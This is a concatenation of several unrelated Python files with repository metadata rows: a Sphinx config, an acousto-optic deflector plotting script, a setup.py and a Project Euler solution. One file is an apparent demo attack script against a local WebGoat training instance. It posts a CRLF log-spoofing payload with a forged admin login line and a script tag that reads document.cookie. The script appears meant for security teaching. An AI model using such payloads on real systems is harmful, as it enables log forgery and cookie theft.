templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'python-loaders'
copyright = u'2012, Oskari Hiltunen'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.2.3'
# The full version, including alpha/beta/rc tags.  Kept in lock-step with
# `version` so a release bump only needs one edit (they previously duplicated
# the literal '0.2.3').
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'python-loadersdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'python-loaders.tex', u'python-loaders Documentation',
u'Oskari Hiltunen', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'python-loaders', u'python-loaders Documentation',
[u'Oskari Hiltunen'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'python-loaders', u'python-loaders Documentation',
u'Oskari Hiltunen', 'python-loaders', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| FelixLoether/python-loaders | docs/conf.py | Python | mit | 7,808 |
from aod_visualisation import AodVisualisation
from vector_utils import normalise
import expt_data as d
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import rcParams
# Global matplotlib styling shared by every figure in this module:
# thick lines, large fonts, and SVG text kept as text rather than paths.
rcParams.update({'lines.linewidth': 3})
rcParams.update({'font.size': 20})
rcParams['svg.fonttype'] = 'none' # No text as paths. Assume font installed.
rcParams['font.serif'] = ['Times New Roman']
rcParams['font.sans-serif'] = ['Arial']
rcParams['font.family'] = 'sans-serif'
# Visualisations for the wide and narrow AODs at the experimental
# wavelengths (785, 800 and 909 nm); acoustic direction along +x,
# with the angular plot bounds given in degrees.
av_wide = AodVisualisation(785e-9, ac_dir_rel=[1,0,0], is_wide=True, deg_bnds=(0,4))
av_narrow = AodVisualisation(785e-9, ac_dir_rel=normalise([1,0,0]), is_wide=False, deg_bnds=(-2,6))
av_narrow_800 = AodVisualisation(800e-9, ac_dir_rel=normalise([1,0,0]), is_wide=False, deg_bnds=(-1,6))
av_narrow_909 = AodVisualisation(909e-9, ac_dir_rel=normalise([1,0,0]), is_wide=False, deg_bnds=(-1,6))
av_wide_800 = AodVisualisation(800e-9, ac_dir_rel=normalise([1,0,0]), is_wide=True, deg_bnds=(-1,6))
av_wide_909 = AodVisualisation(909e-9, ac_dir_rel=normalise([1,0,0]), is_wide=True, deg_bnds=(-1,6))
def plot_eff_pwr_wide():
    # Measured efficiency vs drive power (points) over the model curve, wide AOD.
    plt.plot(d.power, d.eff_power_wide, 'o')
    av_wide.plot_efficiency_power()
def plot_eff_pwr_narrow():
    # Measured efficiency vs drive power (points) over the model curve, narrow AOD.
    plt.plot(d.power, d.eff_power_narrow, 'o')
    av_narrow.plot_efficiency_power()
def plot_eff_freq_wide():
    # Measured efficiency vs acoustic frequency over the model, wide AOD.
    plt.plot(d.freq_wide, d.eff_freq_wide, 'o')
    av_wide.plot_efficiency_freq_max()
def plot_eff_freq_narrow():
    # Measured efficiency vs acoustic frequency over the model, narrow AOD.
    plt.plot(d.freq_narrow, d.eff_freq_narrow, 'o')
    av_narrow.plot_efficiency_freq_max()
def plot_eff_ang_wide():
    # Efficiency vs incidence angle, wide AOD: model first, then measurements.
    av_wide.plot_efficiency_xangle(ac_power=1.5)
    plt.plot(d.angle_wide_again, d.eff_angle_wide_again, 'ro', markersize=12)
    plt.xticks([0,2,4])
    plt.yticks([0,0.5,1])
def plot_eff_ang_narrow():
    # Efficiency vs incidence angle, narrow AOD: model first, then measurements.
    av_narrow.plot_efficiency_xangle(ac_power=1.5)
    plt.plot(d.angle_narrow_again, d.eff_angle_narrow_again, 'ro', markersize=12)
    plt.xticks([-2,2,6])
    plt.yticks([0,0.5,1])
def plot_eff_freq_narrow_expt_model():
    """Overlay measured and modelled efficiency vs frequency for the narrow AOD.

    Plot order matters: plt.legend(label_list) assigns labels in artist
    creation order, so the experimental series must stay before the model
    curves and the transducer curves last.
    """
    plt.plot(d.freq_narrow_new, d.eff_freq_narrow_909_1, 'bo', markersize=8)
    plt.plot(d.freq_narrow_new, d.eff_freq_narrow_800_1, 'go', markersize=8)
    plt.plot(d.freq_narrow_new, d.eff_freq_narrow_909_2, 'ro', markersize=8)
    plt.plot(d.freq_narrow_new, d.eff_freq_narrow_800_23, 'co', markersize=8)
    av_narrow_909.plot_efficiency_freq_max()
    av_narrow_800.plot_efficiency_freq_max()
    av_narrow_909.plot_efficiency_freq_max_second_order()
    av_narrow_800.plot_efficiency_freq_max_second_order()
    plot_narrow_transducer_eff()
    label_list = ['909nm -1 mode expt', '800nm -1 mode expt', '909nm -2 mode expt', '800nm -2 mode expt', \
                  '909nm -1 mode model', '800nm -1 mode model', '909nm -2 mode model', '800nm -2 mode model', \
                  'RF to acoustic inferred', 'RF to acoustic spline']
    plt.legend(label_list, loc=0, borderaxespad=1.6, fontsize=16)
def plot_eff_freq_wide_expt_model():
    """Overlay measured and modelled efficiency vs frequency for the wide AOD.

    Plot order matters: plt.legend(label_list) assigns labels in artist
    creation order.
    """
    # BUGFIX: the experimental points were previously plotted *after* the
    # model curves while label_list still named the experiments first, so the
    # legend entries were mislabelled.  Plot experiments first, matching both
    # the label order and plot_eff_freq_narrow_expt_model.
    plt.plot(d.freq_wide_new, d.eff_freq_wide_909_1, 'bo', markersize=12)
    plt.plot(d.freq_wide_new, d.eff_freq_wide_800_1, 'go', markersize=12)
    plt.plot(d.freq_wide_new, d.eff_freq_wide_909_2, 'ro', markersize=12)
    plt.plot(d.freq_wide_new, d.eff_freq_wide_800_2, 'co', markersize=12)
    av_wide_909.plot_efficiency_freq_max()
    av_wide_800.plot_efficiency_freq_max()
    av_wide_909.plot_efficiency_freq_max_second_order()
    av_wide_800.plot_efficiency_freq_max_second_order()
    plot_wide_transducer_eff()
    label_list = ['909nm -1 mode expt', '800nm -1 mode expt', '909nm -2 mode expt', '800nm -2 mode expt', \
                  '909nm -1 mode model', '800nm -1 mode model', '909nm -2 mode model', '800nm -2 mode model', \
                  'RF to acoustic inferred', 'RF to acoustic spline']
    plt.legend(label_list, loc=0, borderaxespad=1.6, fontsize=16)
def plot_wide_transducer_eff():
    # RF-to-acoustic transducer efficiency for the wide AOD: inferred points
    # at the measured frequencies plus the spline over 20-50 MHz.
    from aol_model.set_up_utils import transducer_efficiency_wide
    f = np.linspace(20, 50, 300) * 1e6
    plt.plot(d.freq_wide_new, transducer_efficiency_wide(np.array(d.freq_wide_new)*1e6), 'mo')
    plt.plot(f/1e6, transducer_efficiency_wide(f))
def plot_narrow_transducer_eff():
    # Same as plot_wide_transducer_eff but for the narrow AOD.
    from aol_model.set_up_utils import transducer_efficiency_narrow
    f = np.linspace(20, 50, 300) * 1e6
    plt.plot(d.freq_narrow_new, transducer_efficiency_narrow(np.array(d.freq_narrow_new)*1e6), 'mo', markersize=8)
    plt.plot(f/1e6, transducer_efficiency_narrow(f))
def plot_transducer_eff():
    # Both transducer curves plus the forward-reflected efficiency data.
    plot_narrow_transducer_eff()
    plot_wide_transducer_eff()
    plt.plot(d.freq_narrow_new, d.fwd_ref_eff_narrow, marker='o')
    plt.plot(d.freq_wide_new, d.fwd_ref_eff_wide, marker='o')
if __name__ == '__main__':
    # Uncomment the figures of interest; each plot_* call draws into the
    # current matplotlib figure.
    # NOTE(review): with the intervening plt.figure() commented out, the two
    # active angle plots share one figure -- confirm that is intended.
    #plot_transducer_eff()
    #plt.figure()
    #plot_eff_freq_narrow_expt_model()
    #plt.figure()
    #plot_eff_freq_wide_expt_model()
    #plt.figure()
    #plot_eff_freq_narrow()
    #plt.figure()
    #plot_eff_freq_wide()
    #plt.figure()
    plot_eff_ang_wide()
    #plt.figure()
    plot_eff_ang_narrow()
    #plt.figure()
    #plot_eff_pwr_narrow()
    #plt.figure()
    #plot_eff_pwr_wide()
| GeoffEvans/aol_model | aol_model/aod_model_expt_comparison.py | Python | gpl-3.0 | 5,046 |
"""
"""
import argparse
import re
import json
import sys
import requests
url1 = 'http://127.0.0.1:8080/WebGoat/login.mvc'
url2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
url3 = 'http://127.0.0.1:8080/WebGoat/'
payload1 = {'username':'webgoat','password':'webgoat'}
session = requests.Session()
first = session.get(url1)
login = session.post(url2, data=payload1)
lessonMenu = session.get('http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc')
lessons = lessonMenu.text
parsed = json.loads(lessons)
for each in parsed:
if 'Injection Flaws' in (each['name']):
for e in each['children']:
if 'Log Spoofing' in e['name']:
lessonLink = (e['link'])
payload2 = {'username':'Smith%250d%250aLogin+Succeeded+for+username%3A+admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E+&password=&SUBMIT=Login'}
log = session.post(url3+lessonLink, data=payload2)
if 'Login Succeeded' in log.text:
print('Attack Successful')
else:
print('Attack Failed')
| mtesauro/gauntlt-demo | examples/webgoat/vuln-13/vuln-13.py | Python | mit | 979 |
# coding=utf-8
# !/usr/bin/env python
import sys
# Prefer setuptools; fall back to plain distutils when it is unavailable.
try:
    from setuptools import setup
except ImportError:
    sys.stderr.write('using distutils\n')
    from distutils.core import setup
# Read install requirements; for VCS links keep only the project name after
# "#egg=" so setuptools receives a valid requirement specifier.
with open('requirements.txt') as f:
    required = f.read().splitlines()
# BUGFIX: test for '#egg=' specifically.  The old check ('#' in req) raised
# IndexError on any line containing a plain '#' comment without '#egg='.
required = [req.split('#egg=')[1] if '#egg=' in req else req for req in required]
# Configuration .ini files shipped with the package.  Listed once so that
# package_data and data_files (which previously duplicated the same seven
# paths) cannot drift apart.
_INI_FILES = [
    'src/amberdriver/common/amber.ini',
    'src/amberdriver/dummy/dummy.ini',
    'src/amberdriver/hokuyo/hokuyo.ini',
    'src/amberdriver/drive_to_point/drive_to_point.ini',
    'src/amberdriver/drive_support/drive_support.ini',
    'src/amberdriver/roboclaw/roboclaw.ini',
    'src/amberdriver/tools/main.ini',
]

setup(
    name='amber-python-drivers',
    packages=[
        'amberdriver',
        'amberdriver.common',
        'amberdriver.dummy',
        'amberdriver.hokuyo',
        'amberdriver.drive_to_point',
        'amberdriver.drive_support',
        'amberdriver.null',
        'amberdriver.roboclaw',
        'amberdriver.tools',
        'amberdriver.tests'
    ],
    # Map each package onto its directory under src/.
    package_dir={
        'amberdriver': 'src/amberdriver',
        'amberdriver.common': 'src/amberdriver/common',
        'amberdriver.dummy': 'src/amberdriver/dummy',
        'amberdriver.hokuyo': 'src/amberdriver/hokuyo',
        'amberdriver.drive_to_point': 'src/amberdriver/drive_to_point',
        'amberdriver.drive_support': 'src/amberdriver/drive_support',
        'amberdriver.null': 'src/amberdriver/null',
        'amberdriver.roboclaw': 'src/amberdriver/roboclaw',
        'amberdriver.tools': 'src/amberdriver/tools',
        'amberdriver.tests': 'src/amberdriver/tests'
    },
    package_data={'': _INI_FILES},
    data_files=[
        ('', _INI_FILES),
    ],
    test_suite="amberdriver.tests",
    include_package_data=True,
    install_requires=required,
    version='1.19',
    description='Amber drivers in python',
    author=u'Paweł Suder',
    author_email='pawel@suder.info',
    url='http://project-capo.github.io/',
    download_url='http://github.com/project-capo/amber-python-drivers/',
    keywords=[
        'amber',
        'dummy',
        'hokuyo',
        'drive to point',
        'drive support',
        'roboclaw',
        'panda'
    ],
    classifiers=[
        'Programming Language :: Python',
        'Development Status :: 4 - Beta',
        'Environment :: Other Environment',
        'Intended Audience :: Developers',
        'License :: Other/Proprietary License',
        'Operating System :: OS Independent',
    ],
    long_description='''\
'''
)
| project-capo/amber-python-drivers | setup.py | Python | mit | 2,925 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from itertools import product
def palindrome(num):
    """Return True if the decimal representation of num reads the same backwards."""
    digits = str(num)
    return digits == ''.join(reversed(digits))
# Project Euler 4: largest palindrome made from the product of two
# three-digit numbers.  Python 2 file (xrange, print statement, and
# tuple-unpacking lambda parameters).
multiples = (
    (a, b) for a, b in product(xrange(100, 1000), repeat=2) if palindrome(a*b)
)
print max(multiples, key=lambda (a, b): a*b)
| demonkit/projecteuler | pyimpl/4.py | Python | gpl-2.0 | 285 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.